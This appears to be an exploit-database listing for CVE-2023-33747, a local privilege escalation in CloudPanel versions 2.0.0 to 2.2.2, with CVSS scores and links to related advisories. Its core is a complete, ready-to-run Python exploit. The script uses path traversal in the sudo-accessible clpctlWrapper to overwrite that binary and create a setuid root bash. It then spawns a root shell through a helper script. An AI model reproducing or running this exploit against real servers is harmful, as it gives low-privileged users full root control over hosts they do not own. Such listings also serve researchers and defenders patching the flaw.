Lucene search
EagleEye1337DAY-ID-38768HistoryJun 07, 2023 - 12:00 a.m.
CloudPanel 2.2.2 Privilege Escalation / Path Traversal Exploit
2023-06-0700:00:00
EagleEye
0day.today
175
exploit
privilege escalation
path traversal
cloudpanel
cve-2023-33747
eagleeye
github
vendor
ssh
python3
vulnerability
escalation step
date
root shell
CVSS3
7.8
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
0.001
Percentile
25.6%
CloudPanel versions 2.0.0 through 2.2.2 suffer from a privilege escalation vulnerability when a traversal is leveraged against clpctlWrapper for which all normal users have sudo access.
# Title : Privilege Escalation through path traversal
# CVE ID : CVE-2023-33747
# Exploit Author : EagleEye
# Github : https://github.com/EagleTube/CloudPanel/tree/main/CVE-2023-33747
# Version Affected : CloudPanel v2.0.0 - v2.2.2
# Vendor : CloudPanel.io
# Date : 31/05/2023 , 12:00 PM
# Step : Login as ssh as user, and run `python3 CVE-2023-33747_GetRoot.py`
# Date : 06 June 2023
# CVE-2023-33747_GetRoot.py
import os
import subprocess
def exec_command(command):
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
def exploit():
print('[+] Overriding file to writable')
exec_command('sudo /usr/bin/clpctlWrapper system:permissions:reset --files=777 --path=../../../../../../../../../../usr/bin/clpctlWrapper')
print('[+] Backup clpctlWrapper into tmp...')
exec_command('cp /usr/bin/clpctlWrapper /tmp/clpctlWrapper')
print('[+] Replacing clpctlWrapper with cp...')
exec_command('cp /bin/bash /tmp/bash')
print('[+] Assigning suid to /tmp/bash...')
exec_command('cp /bin/chown /usr/bin/clpctlWrapper')
exec_command('sudo /usr/bin/clpctlWrapper root:root /tmp/bash')
exec_command('cp /bin/chmod /usr/bin/clpctlWrapper')
exec_command('sudo /usr/bin/clpctlWrapper 6755 /tmp/bash')
exec_command('cp /tmp/clpctlWrapper /usr/bin/clpctlWrapper')
print('[+] Popping root shell...')
os.system('/tmp/bash -p -c "chown root:root /usr/bin/clpctlWrapper && chmod 0700 /usr/bin/clpctlWrapper && python3 root.py"')
if __name__ == '__main__':
exploit()
# root.py
import os
os.setreuid(0,0)
os.setregid(0,0)os.system('/bin/bash')
Related
osv
osv
CVE-2023-33747
2023-06-06 18:15:11
nvd
nvd
CVE-2023-33747
2023-06-06 18:15:11
prion
prion
Path traversal
2023-06-06 18:15:00
packetstorm
packetstorm
CloudPanel 2.2.2 Privilege Escalation / Path Traversal
2023-06-07 00:00:00
cve
cve
CVE-2023-33747
2023-06-06 18:15:11
cvelist
cvelist
CVE-2023-33747
2023-06-06 00:00:00
CVSS3
7.8
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
0.001
Percentile
25.6%
Related for 1337DAY-ID-38768